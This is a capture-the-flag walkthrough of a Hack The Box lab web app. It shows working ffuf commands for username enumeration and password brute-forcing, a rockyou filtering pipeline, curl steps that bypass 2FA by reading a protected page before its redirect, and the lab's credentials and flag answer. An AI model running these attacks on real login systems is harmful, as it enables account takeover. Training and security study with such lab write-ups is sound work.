HTB Broken Authentication - Skills Assessment

Published: April 13, 2026

Finding the flag for the Broken Authentication module

Walkthrough

Target: http://IP:PORT - MetaDocs web application

Vulnerabilities Found & Exploited

1. Username Enumeration (Information Disclosure)

The login page returns different error messages depending on whether a username exists:

  • Existing user, wrong password → “Invalid credentials.” (response size: 4344)
  • Non-existing user → “Unknown username or password.” (response size: 4353)

Used ffuf to enumerate usernames from the xato-net-10-million-usernames wordlist, filtering by response size:

ffuf -w xato-usernames.txt -u http://TARGET/login.php -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=FUZZ&password=Testpass12345" -fs 4353

Important: the password in the request had to match the password policy, otherwise the server responds differently. Found user: gladys

2. Weak Password Policy → Password Brute-Force

The password policy (exactly 12 chars, upper+lower+digits, NO special chars) actually reduces the keyspace. Filtered rockyou.txt from 14M passwords down to ~17K:

grep '[[:upper:]]' rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]' \
  | grep -E '^.{12}$' | grep -E '^[a-zA-Z0-9]+$' > custom_exact12.txt

Then brute-forced with ffuf:

ffuf -w custom_exact12.txt -u http://TARGET/login.php -X POST \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=gladys&password=FUZZ" -fr "Invalid credentials"

Found password: dWinaldasD13

3. 2FA Bypass via Direct Access (Authentication Bypass)

After logging in, gladys gets redirected to 2fa.php for OTP verification. However, accessing profile.php directly returns a 302 redirect to 2fa.php but the response body still contains the full page content including the flag. The server renders the protected page before enforcing the redirect — a classic authentication bypass.

Login to get session:

SESSION=$(curl -s -i -X POST http://TARGET/login.php \
  -d "username=gladys&password=dWinaldasD13" | \
  grep "Set-Cookie: PHPSESSID" | head -1 | cut -d'=' -f2 | cut -d';' -f1)

Access profile.php directly:

curl -s -b "PHPSESSID=$SESSION" http://TARGET/profile.php

The response body contained: HTB{d86115e037388d0fa29280b737fd9171}

← Back to home